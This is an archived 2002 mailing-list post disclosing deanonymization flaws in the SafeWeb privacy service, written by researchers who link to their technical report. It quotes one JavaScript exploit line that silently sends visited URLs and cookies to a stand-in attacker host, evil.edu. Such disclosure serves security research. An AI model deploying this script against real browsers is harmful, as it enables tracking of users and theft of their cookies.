[iwar] [fc:Deanonymizing.SafeWeb.Users]

• Next message: Fred Cohen: "[iwar] [fc:Cybersecurity.alliance.launches.without.funding,.leadership]"
• Previous message: Fred Cohen: "[iwar] [fc:Cybersecurity.A.Top.Priority:.White.House.Adviser.Presses.Computer.Industry.to.Do.More]"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Return-Path: <sentto-279987-4460-1013751448-fc=all.net@returns.groups.yahoo.com>
Delivered-To: fc@all.net
Received: from 204.181.12.215 [204.181.12.215] by localhost with POP3 (fetchmail-5.7.4) for fc@localhost (single-drop); Thu, 14 Feb 2002 21:59:09 -0800 (PST)
Received: (qmail 15850 invoked by uid 510); 15 Feb 2002 05:37:42 -0000
Received: from n21.groups.yahoo.com (216.115.96.71) by all.net with SMTP; 15 Feb 2002 05:37:42 -0000
X-eGroups-Return: sentto-279987-4460-1013751448-fc=all.net@returns.groups.yahoo.com
Received: from [216.115.97.191] by n21.groups.yahoo.com with NNFMP; 15 Feb 2002 05:23:11 -0000
X-Sender: fc@red.all.net
X-Apparently-To: iwar@onelist.com
Received: (EGP: mail-8_0_2); 15 Feb 2002 05:37:27 -0000
Received: (qmail 3390 invoked from network); 15 Feb 2002 05:37:27 -0000
Received: from unknown (216.115.97.172) by m5.grp.snv.yahoo.com with QMQP; 15 Feb 2002 05:37:27 -0000
Received: from unknown (HELO red.all.net) (12.232.72.152) by mta2.grp.snv.yahoo.com with SMTP; 15 Feb 2002 05:37:27 -0000
Received: (from fc@localhost) by red.all.net (8.11.2/8.11.2) id g1F5vRC08337 for iwar@onelist.com; Thu, 14 Feb 2002 21:57:27 -0800
Message-Id: <200202150557.g1F5vRC08337@red.all.net>
To: iwar@onelist.com (Information Warfare Mailing List)
Organization: I'm not allowed to say
X-Mailer: don't even ask
X-Mailer: ELM [version 2.5 PL3]
From: Fred Cohen <fc@all.net>
X-Yahoo-Profile: fcallnet
Mailing-List: list iwar@yahoogroups.com; contact iwar-owner@yahoogroups.com
Delivered-To: mailing list iwar@yahoogroups.com
Precedence: bulk
List-Unsubscribe: <mailto:iwar-unsubscribe@yahoogroups.com>
Date: Thu, 14 Feb 2002 21:57:27 -0800 (PST)
Subject: [iwar] [fc:Deanonymizing.SafeWeb.Users]
Reply-To: iwar@yahoogroups.com
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

Although SafeWeb's Web anonymizing service has been shut down since
December, they claimed it was the "most widely used online privacy service
in the world".  SafeWeb licensed their technology to PrivaSec, who is
currently running the technology in a preview program for a planned
subscription service.  They also licensed it to the CIA.

Andrew Schulman and I have just finished a technical report detailing
SafeWeb's catastrophic failures under the simplest of JavaScript attacks by
Web sites or firewalls (e.g., by redirecting to a page containing the
exploit).  An example (really one long line):

self['window']['top'].frames[0]['cookie_munch'] = Function('i=new
Image(1,1);i.s'+'rc="https://evil.edu/"+top.frames[0].document.forms["fugulo
cation"].URL_text.value+(new Date()).getTime()+document.cookie;');

This is spyware.  Any Web page containing this JavaScript makes the SafeWeb
browser silently report every URL visited to the attacker at evil.edu, along
with a copy of all of the persistent cookies previously established through
SafeWeb.  It works regardless of the user's security settings (recommended
vs paranoid mode, etc.)  This attack is the only one we describe that
depends on the browser: it works in Netscape 6.x and probably previous
versions, but not IE.  We have an attack that does basically the same thing
and works in IE too, but it's a bit longer.  Since our attacks are just
JavaScript, they probably don't depend on the OS of the victim.

Basically, using the SafeWeb privacy service helps keep user identities out
of routinely gathered log files, but it creates serious new risks for anyone
an adversary might bother to actually target.  You have to wonder whether
this is a good tradeoff.  After all, in the absence of serious bugs, Web
browsers generally prevent Web sites from silently depositing spyware or
snarfing all of the user's cookies.  One thing is clear: most users in the
intended market for this system had no idea that this system brought any
risks with it.

For the full report (23 pages, PDF):
<a href="http://www.cs.bu.edu/techreports/pdf/2002-003-deanonymizing-safeweb.pdf">http://www.cs.bu.edu/techreports/pdf/2002-003-deanonymizing-safeweb.pdf>

We've been in touch with SafeWeb since October, and with PrivaSec for about
a month now.  Some related problems in SafeWeb involving JavaScript spilling
IP addresses have been noted here (by Alexander Yezhov) and in
alt.privacy.anon-server (by Paul Rubin).  Our paper adds spyware, cookie
snarfing, and the essential equivalence between SafeWeb's "paranoid" and
"recommended" modes of operation to the list of problems with SafeWeb's
technology.

David Martin http://www.cs.bu.edu/~dm
Andrew Schulman http://www.undoc.com/

------------------------ Yahoo! Groups Sponsor ---------------------~-->
Sponsored by VeriSign - The Value of Trust
Pinpoint the right security solution for your company - FREE
Guide from industry leader VeriSign gives you all the facts.
http://us.click.yahoo.com/lWSNbC/WdiDAA/yigFAA/kgFolB/TM
---------------------------------------------------------------------~->

------------------
http://all.net/ 

Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 

• Next message: Fred Cohen: "[iwar] [fc:Cybersecurity.alliance.launches.without.funding,.leadership]"
• Previous message: Fred Cohen: "[iwar] [fc:Cybersecurity.A.Top.Priority:.White.House.Adviser.Presses.Computer.Industry.to.Do.More]"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.2 : 2002-12-31 02:15:03 PST